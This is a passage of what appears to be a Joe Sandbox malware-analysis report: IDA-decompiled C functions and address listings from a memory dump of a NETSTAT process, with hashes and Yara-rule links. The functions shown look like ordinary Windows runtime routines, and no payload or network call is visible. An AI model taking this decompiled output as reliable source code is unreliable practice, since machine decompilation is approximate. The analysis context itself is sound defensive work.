					}
				}
			}

0x02f2ae44
0x02f2ae4c
0x02f2ae53
0x02f2ae55
0x02f2ae5c
0x02f2ae64
0x02f2ae68
0x02f2ae75
0x02f2ae75
0x02f2ae78
0x02f2ae7a
0x02f2ae7c
0x02f2ae7f
0x02f2aea8
0x02f2aeab
0x02f2aead
0x00000000
0x00000000
0x02f2aeb3
0x02f2aeb8
0x02f2aebb
0x02f2aebd
0x00000000
0x02f2ae81
0x02f2ae88
0x02f2ae8f
0x02f2ae9b
0x02f2ae96
0x02f2ae96
0x02f2ae96
0x02f2aea0
0x02f2aea3
0x02f2aebf
0x02f2aebf
0x02f2aec3
0x02f2aec9
0x02f2af0d
0x02f2af14
0x02f2af3d
0x02f2af3d
0x02f2af41
0x02f2af44
0x02f2af67
0x02f2af67
0x02f2af6a
0x02f2afca
0x02f2afd1
0x00000000
0x02f2afd1
0x02f2af6c
0x02f2af6d
0x02f2af75
0x02f2af7c
0x02f2af7e
0x02f2af80
0x02f2af85
0x02f2af87
0x02f2af99
0x02f2af89
0x02f2af92
0x02f2af92
0x02f2af9e
0x02f2afa1
0x02f2afa3
0x02f2afa9
0x02f2afb0
0x02f2afb2
0x02f2afb4
0x02f2afbc
0x02f2afbc
0x02f2afb4
0x02f2afb0
0x00000000
0x02f2afa1
0x02f2af4f
0x02f2af57
0x02f2af5c
0x02f2af5e
0x00000000
0x00000000
0x02f2af60
0x02f2af64
0x02f2af64
0x00000000
0x02f2af64
0x02f2af1a
0x02f2af25
0x00000000
0x00000000
0x02f2af27
0x02f2af28
0x02f2af33
0x00000000
0x02f2aed0
0x02f2aed0
0x02f2aed2
0x02f2aee1
0x02f2aee4
0x00000000
0x00000000
0x02f2aee6
0x02f2aeec
0x00000000
0x00000000
0x02f2aefb
0x02f2af07
0x02f2afd3
0x02f2afdb
0x02f2afdb
0x00000000
0x02f2af07
0x02f2aed6
0x02f2aed8
0x02f2aedf
0x00000000
0x00000000
0x00000000
0x02f2aedf
0x02f2aec9

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcca728bd0ea214b2b8d09dd0d94625cb59a7df2318e789778e3d4670885eab7
Instruction ID: 6535774f3ea49c6246ed50cbcccca84e95b084f185e8395be176b7698c60b8d7
Opcode Fuzzy Hash: bcca728bd0ea214b2b8d09dd0d94625cb59a7df2318e789778e3d4670885eab7
Instruction Fuzzy Hash: 0041F972B007319BC725DA26CC94B3BB79AEF867D4F044619FB66C7290D738D809CA91

Uniqueness

Uniqueness Score: -1.00%

Function 02E8DBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E02E8DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E02E6CC50(E02E64510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E02E87D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E02F38ED6(_t102, _t98);
						}
						_t76 = _v44;
						E02E82280(_t58, _v44);
						E02E8DD82(_v44, _t102, _t98);
						E02E8B944(_t102, _v5);
						return E02E7FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x2f58628; // 0x0
							_v28 = _t67;
							_t68 =  *0x2f5862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x2f58628; // 0x0
						_t105 = _v28;
						_t80 =  *0x2f5862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x2f2fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x02e8dbe9
0x02e8dbf2
0x02e8dbf7
0x02e8dbf9
0x02e8dbfc
0x02e8dc00
0x02e8dc03
0x02e8dc14
0x02e8dd54
0x02e8dd54
0x02e8dd54
0x02e8dc18
0x02e8dc1d
0x02e8dc1d
0x02e8dc32
0x02e8dc3b
0x02e8dc3e
0x02e8dc46
0x02e8dd5b
0x02e8dd62
0x02e8dd64
0x02e8dd67
0x02e8dd69
0x02e8dd6b
0x02e8dd6e
0x02e8dd70
0x02e8dd73
0x02e8dd73
0x00000000
0x02e8dc4c
0x02e8dc4e
0x02ed3ae3
0x02ed3ae8
0x02ed3aea
0x02e8dce7
0x02e8dce9
0x02e8dcec
0x02e8dcee
0x02e8dcf0
0x02e8dcf3
0x02e8dcf5
0x02ed3af2
0x02ed3af5
0x02ed3af5
0x02e8dd06
0x02e8dd08
0x02e8dd0b
0x02e8dd12
0x02ed3b08
0x02e8dd18
0x02e8dd18
0x02e8dd18
0x02e8dd20
0x02e8dd23
0x02ed3b16
0x02ed3b16
0x02e8dd29
0x02e8dd2d
0x02e8dd36
0x02e8dd40
0x02e8dd51
0x02e8dd51
0x02e8dc54
0x02e8dc59
0x02e8dc59
0x02e8dc5e
0x02e8dc5e
0x02e8dc63
0x02e8dc66
0x02e8dc6b
0x02e8dc78
0x02e8dc7b
0x02e8dc81
0x02e8dc81
0x02e8dc83
0x02e8dc89
0x00000000
0x00000000
0x02e8dd7b
0x02e8dd7b
0x02e8dc8f
0x02e8dc8f
0x02e8dc92
0x02e8dc99
0x02e8dc9f
0x02e8dca5
0x02e8dcaa
0x02e8dcaa
0x02e8dcb3
0x02e8dcb8
0x02e8dcbb
0x02e8dcc1
0x02e8dccf
0x02e8dcd2
0x02e8dcd5
0x02e8dcd7
0x02e8dcda
0x02e8dcdc
0x02e8dcdc
0x02e8dce2
0x02e8dce4
0x00000000
0x02e8dce4

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a2349ed6facf8a1fcd83442f96970c9c7ded66efba5febf7efd5e2656dddade
Instruction ID: 06882a0afe1fa0111811ed8dcdcc73bbd371f2412083476e1950b49ba23c7eb6
Opcode Fuzzy Hash: 7a2349ed6facf8a1fcd83442f96970c9c7ded66efba5febf7efd5e2656dddade
Instruction Fuzzy Hash: 82518F71A40615CFCB14EFB8C89069DF7F1BB49354F209659D59DA7380EB30A944CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E7EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E02E7EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E02E69080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x775ec21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E02E62D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x02e7ef4b
0x02e7ef4d
0x02e7ef57
0x02e7f0bd
0x02e7f0c2
0x02e7f0d2
0x02e7f0d2
0x02e7f0c2
0x02e7ef5d
0x02e7ef5f
0x02e7ef67
0x02e7ef6a
0x02e7ef6d
0x02e7ef74
0x02e7ef7f
0x02e7ef82
0x02e7ef82
0x02e7ef86
0x02e7ef88
0x02e7ef8c
0x02e7ef8f
0x02e7ef8f
0x02e7ef8f
0x00000000
0x02e7ef91
0x02e7ef93
0x02e7efc4
0x02e7efc4
0x02e7efc4
0x02e7efca
0x02e7efd0
0x02e7f0a6
0x00000000
0x00000000
0x02e7f0af
0x02ecbb06
0x02ecbb0a
0x02e7f0b5
0x02e7f0b5
0x02e7f0b5
0x02e7f0b5
0x00000000
0x02e7efd6
0x02e7efd9
0x02e7f0de
0x02e7f0e2
0x02e7efdf
0x02e7efdf
0x02e7efdf
0x02e7efe5
0x02ecbafc
0x02ecbafc
0x02e7efe5
0x02e7efeb
0x02e7efed
0x02e7f00f
0x02e7f011
0x02e7f01a
0x02e7f01d
0x02e7f021
0x02e7f028
0x02e7f029
0x02e7f029
0x02e7f02c
0x00000000
0x02e7f02c
0x02e7eff3
0x02e7eff9
0x02e7f0ea
0x02e7f0ed
0x02e7f0ef
0x00000000
0x02e7f0ef
0x02e7f003
0x02ecbb12
0x02e7f045
0x02e7f049
0x02e7f051
0x02e7f09e
0x02e7f0a0
0x02e7f0a0
0x02e7f09e
0x02e7f053
0x02e7f064
0x02e7f064
0x02e7f06b
0x02ecbb1a
0x02ecbb1a
0x02e7f071
0x02e7f071
0x02e7f07d
0x02e7f082
0x02e7f08f
0x02e7f08f
0x02e7f009
0x02e7f00d
0x00000000
0x02e7f00d
0x02e7efd0
0x02e7ef97
0x02e7efa5
0x02e7efaa
0x00000000
0x02e7efac
0x02e7efac
0x02e7efac
0x00000000
0x02e7efb2
0x02e7f036
0x02e7f03a
0x02e7f040
0x02e7f090
0x00000000
0x02e7f092
0x02e7f042
0x00000000
0x02e7f042
0x02e7efb7
0x02e7efb9
0x02e7efbc
0x02e7efb0
0x02e7efb0
0x00000000
0x02e7efbe
0x02e7efbe
0x02e7efc1
0x00000000
0x02e7efc1
0x02e7efbc
0x02e7efaa
0x02e7ef91

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: b72f74abf0a546d9403b5bd561db1cdd407a179b45212bed572ca789992036ba
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 73512430E84249DFDB24CB69C1D07EEBBB2AF1531CF28E1A8D45593B81C375A989C791

Uniqueness

Uniqueness Score: -1.00%

Function 02F3740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E02F3740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E02EBD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E02EAF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L02E84620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L02E84620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E02EAF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L02E84620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x02f3740d
0x02f3740d
0x02f37412
0x02f37413
0x02f37416
0x02f37418
0x02f3741c
0x02f3741f
0x02f37422
0x02f37422
0x02f37428
0x02f3742a
0x02f3742a
0x02f37451
0x02f37432
0x02f3744f
0x02f3744f
0x00000000
0x02f37434
0x02f37438
0x02f37443
0x02f37517
0x02f37517
0x02f3751a
0x02f37535
0x02f37520
0x02f37527
0x02f3752c
0x02f37531
0x02f37533
0x00000000
0x02f37533
0x00000000
0x02f37531
0x02f3754b
0x02f3754f
0x02f3755c
0x02f3755c
0x02f3755f
0x02f37560
0x02f37561
0x02f37562
0x02f37563
0x02f37568
0x02f3756a
0x02f3756c
0x02f3756d
0x02f3756d
0x02f3756f
0x02f37572
0x02f37574
0x02f37577
0x02f3757c
0x02f3757f
0x00000000
0x02f37551
0x02f37551
0x02f37551
0x02f37553
0x02f37553
0x02f37449
0x02f37449
0x02f3744c
0x02f3744c
0x00000000
0x02f3744c
0x02f37443
0x02f3750e
0x02f37514
0x02f37514
0x02f37455
0x02f37469
0x02f3746d
0x00000000
0x02f37473
0x02f37473
0x02f37476
0x02f37480
0x02f37484
0x02f3748e
0x02f37493
0x02f37493
0x02f37496
0x02f37499
0x02f374a1
0x02f374b1
0x02f374b5
0x00000000
0x02f374bb
0x02f374c1
0x02f374c1
0x02f374c4
0x02f374c5
0x02f374c6
0x02f374c7
0x02f374c8
0x02f374cd
0x00000000
0x02f374d3
0x02f374d3
0x02f374d6
0x02f374d8
0x02f374db
0x02f374dd
0x02f374e0
0x02f374e7
0x02f374ee
0x02f374ee
0x02f374f4
0x02f374f9
0x00000000
0x02f374fb
0x02f374fb
0x02f374fd
0x02f37500
0x02f37503
0x02f37505
0x02f37505
0x02f374f9
0x00000000
0x02f374cd
0x02f374b5
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 09560d38e292a5256d9ae3acc7509edde7a0242832fda7bcd4b32e6b07dce6a3
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 47517CB2A40606EFCB1ADF14C580A96FBB5FF45344F14C0AAEA089F251E371E946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E92990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E02E92990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x2f3ff00);
				E02EBD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x2e41664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E02EAE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x2e41668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E02EE51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x2e4166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E02E92AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E02E76600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E02E92C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E02E7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E02E92AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E02E92C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E02E92ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E02EBD0D1(_t62);
				goto L28;
			}

0x02e92990
0x02e92992
0x02e92997
0x02e929a3
0x02e929a6
0x02e929ab
0x02e929ad
0x02e929b2
0x02ed5c80
0x02e929b8
0x02e929b8
0x02e929bb
0x02e929c0
0x02e929c5
0x02e929c6
0x02e929c6
0x02e929cb
0x00000000
0x00000000
0x02e929cd
0x02e929d0
0x02e929d9
0x02e929db
0x02e929dd
0x02e92a7f
0x02e92a84
0x02e92a87
0x02e92a89
0x02ed5ca1
0x02ed5ca3
0x00000000
0x02e92a8f
0x02e92a8f
0x00000000
0x02e92a8f
0x00000000
0x02e929e3
0x02e929e3
0x02e929e3
0x00000000
0x02e929e3
0x02e929dd
0x00000000
0x02e929db
0x02e929e6
0x02e929e9
0x02e929eb
0x02e929ed
0x02e929f3
0x02e929f5
0x02e929f8
